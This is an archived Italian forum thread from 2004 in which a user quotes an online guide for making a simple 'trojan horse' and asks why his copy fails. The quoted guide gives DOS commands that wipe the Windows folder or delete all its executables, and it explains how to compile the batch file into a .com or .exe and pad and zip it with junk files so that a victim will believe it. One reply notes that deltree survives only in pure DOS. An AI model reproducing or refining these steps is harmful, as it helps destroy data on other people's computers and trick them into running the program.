PDA

View Full Version : Stringhe di comando.... --->virus


Dj Huzi
02-03-2004, 12:00
ciao amici.. allora ho trovato una guida in internet... x creare virus di base..... premetto k nn voglio creare danni a nessuno,è solo una mia soddisfazione....
la guida spiegava cosi:

"Immagino già la domando che vi state ponendo:
"Come faccio ad eliminare un' intera directory?"
Semplice!!!

@deltree /y C:\Windows\*.*

In questo modo cancelleremo tutti i file presenti presenti
nella cartella Windows(non proprio tutti perchè alcuni sono
protetti e non possono essere eliminati dal Prompt del Dos)
(Anche questo è spiegato dopo)
Ora, però analizziamo l'esempio.
Come avete potuto notare il comando "deltree" e seguito
da uno "Spazio" e da "/y".
Infatti lasciando uno "Spazio" dopo "deltree" e aggiungendo la
stringa "/y" verrà eliminata l'intera directory.
Ma cosa sarebbe successo se nonn avessimo messo la stringa
"/y", beh sullo schermop sarebbe appraso il messaggio:
"Eliminare la directory (nomedirectory) ...[sn]" ma utilizando
"/y" questo messaggio non appare, ugualmente però la
directory viene eliminata."


e ora viene spiegato come salvare il "virus"

"Supponiamo di aver creato un Troyan Horse con le seguenti
stringe di comando:

@del C:\Windows\*.exe

Cioè cancella tutti gli exe di Windows.
Una volta creato in Notepad aprire il Menù "File" e aprire
la voce "Salva con Nome",vi apparirà una schermata che vi
chiede dove salvare il file.
Decidete la locazione del virus,ed, in basso, sotto la voce
"Nome file" mettete il nome.
Fatto questo aprite il prompt del Dos e rinominate il file creato
con l'estenzione .ext .
Per fare questo utilizzate il comando "Ren".
Una volta rinominato il file con l'estensione .ext ,apritelo
con Bat2Com,si creerà un file .com (cioè un eseguibile x Dos).
Ora,avete due possibilità:
1)Lasciare il virus con l'estensione .com
(Ha la priorità d'esecuzione ma è meno credibile)
2)Creare un .exe che anche non avendo la priorità
d'esecuzione è comunque più credibile di un .com

Beh., se scegliete la prima non condivido la vostra scelta, ma
vi darò qualche altro suggerimento...
Il troyan ora è bello è fatto,pronto per distruggere,ma..
è molto piccolo quindi poco credibile...
Potreste incrandirlo usando un programma di mia invenzione:
"Expander1.0",piccolo programma capace di ingrandire le
dimensioni dei file .com(li aumenta di circa 93Kb),buono,
vero???
Oppure potete come seconda alternativa creare dei file di
testo con scritte "senza senso" cioè di questo genere:
"jlfhglfdkfnhkgfngkmpgfhjfphknftyo854u6905jhy54yjht0yijt"
Le salvate in un file .txt e poi lo rinominate con una
estesnione qualsiasi come .dat .
Fatto questo zippate il tutto ed ottene un virus credibile e
potente (potente solo se lo volete..).
Nel secondo caso, ovvero se volete creare un .exe dovete
rinominare il virus da .com in .bin .
Poi aprite il .bin con l'applicazione "Com to Exe" presente
nel pacchetto e avrete così creato un bel troya Horse .exe .
Fatto questo procedete come segue e come detto sopra cioè
create dei file "inutili"(ma con nomi credibili) e zippate il
tutto.
Otterrete così un bel Troyan Horse pronto a esplodere."


bene,io ho provato sul mio pc,creando una cartella "xxx" e mettendoci dei file all'interno...
ho creato il virus come sopra descritto.... però non funziona... funziona solo se lo creo cosi:

del c:\xxx\*.*

ma in questo caso mi viene chiesta la conferma x eliminare i file della directory....
se uso la stringa

@del c:\xxx\*.*

oppure

@del /y c:\xxx\*.*

non funziona..

premetto k ho seguido il procedimento dell'exe,non ho provato col bat....

voi mi sapete aiutare?


ps: se nn eravate a conoscenza di questi procedimenti non fate danni !!!!!!!!!!!

Dj Huzi
04-03-2004, 12:42
:eek:

MM
04-03-2004, 14:48
Di quando era l'articolo?

Il comando Deltree non esiste più se non nel DOS puro...

Dj Huzi
04-03-2004, 16:29
probabilmente era molto vecchio.. cmq io uso del...